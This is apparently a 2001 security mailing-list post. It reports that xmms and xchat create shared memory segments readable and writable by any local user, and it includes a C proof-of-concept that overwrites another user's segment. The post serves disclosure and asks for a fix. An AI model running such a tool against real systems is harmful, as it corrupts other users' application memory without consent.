xmms/xchat full access shared memory segments

From: Julien VANEGUE (vanegu_jat_private)
Date: Sat Nov 03 2001 - 02:22:23 PST


    On slackware 8 :
    
    bash-2.05$ ipcs -m
    
    ------ Shared Memory Segments --------
    key        shmid      owner      perms      bytes      nattch     status      
    0x00000000 4216960    mayhem    777        196608     2          dest         
    0x00000000 7636737    mayhem    777        196608     2          dest         
    
    bash-2.05$ ipcs -p -m
    
    ------ Shared Memory Creator/Last-op --------
    shmid      owner      cpid       lpid      
    4216960    mayhem     3921       1406      
    7636737    mayhem     26206      26209     
    
    bash-2.05$ cat /proc/3921/cmdline ; echo
    /opt/gnome/bin/xmms
    bash-2.05$ cat /proc/26206/cmdline ; echo
    /opt/gnome/bin/xchat
    bash-2.05$ 
    
    
    
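    This does not seem to be exploitable (no fault), but it still needs to be fixed: with perms 777, any local user can attach to these segments and read or overwrite their contents. The applications should create them with owner-only permissions.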
    
    /*
    ** test_shm.c
    ** 
    ** Made by Julien Vanegue
    ** Login   <mayhemat_private>
    */
    #include <sys/types.h>
    #include <sys/ipc.h>
    #include <sys/shm.h>
    #include <errno.h>
    #include <limits.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    
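    /*
    ** Print the errno message prefixed by `str` and terminate with a failure
    ** status. The do/while(0) wrapper makes `FATAL(x);` a single statement, so
    ** the macro stays correct inside an unbraced if/else (the bare `{ ... }`
    ** form followed by `;` breaks a following `else`).
    */
    #define	FATAL(str) do { perror(str); exit(-1); } while (0)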
    
    
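    /*
    ** Print the expected command line on stderr and exit with a failure status.
    ** The first argument is a shared memory id (the shmid column printed by
    ** `ipcs -m`), not a semaphore id as the old message said. Never returns.
    */
    void	usage(void)
    {
      fprintf(stderr, "syntax: a.out shmid size \n");
      exit(-1);
    }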
    
    
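    /*
    ** Permission check for a System V shared memory segment: attach to the
    ** segment named by argv[1] and fill its first argv[2] bytes with 'A'.
    **
    ** shmat() with flags 0 asks for a read-write attach, so the call only
    ** succeeds when the segment's mode grants this user read and write access.
    ** A successful run against another user's segment therefore shows that the
    ** segment was created with overly permissive mode bits.
    **
    ** Returns 0 on success; exits with a failure status on bad arguments or
    ** when any of the shm calls fails.
    */
    int	main(int argc, char **argv)
    {
      struct shmid_ds	info;
      char		*addr;
      char		*end;
      long		shmid;
      long		size;

      if (argc != 3)
        usage();

      /* strtol instead of atoi: reject non-numeric and out-of-range input. */
      errno = 0;
      shmid = strtol(argv[1], &end, 10);
      if (errno != 0 || end == argv[1] || *end != '\0' ||
          shmid < 0 || shmid > INT_MAX)
        usage();

      /* A negative size would turn into a huge memset length. */
      errno = 0;
      size = strtol(argv[2], &end, 10);
      if (errno != 0 || end == argv[2] || *end != '\0' || size < 0)
        usage();

      /* Never write past the end of the mapping: compare with the real size. */
      if (shmctl((int) shmid, IPC_STAT, &info) == -1)
        {
          FATAL("shmctl");
        }
      if ((size_t) size > info.shm_segsz)
        {
          fprintf(stderr, "size %ld exceeds segment size %lu\n",
                  size, (unsigned long) info.shm_segsz);
          exit(-1);
        }

      /* The failing call here is shmat, so label the error accordingly. */
      if ((addr = shmat((int) shmid, NULL, 0)) == (void *) -1)
        {
          FATAL("shmat");
        }

      memset(addr, 'A', (size_t) size);

      /* Stay attached briefly; presumably so the attach shows up in ipcs. */
      sleep(2);

      if (shmdt(addr) == -1)
        {
          FATAL("shmdt");
        }
      return (0);
    }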
    


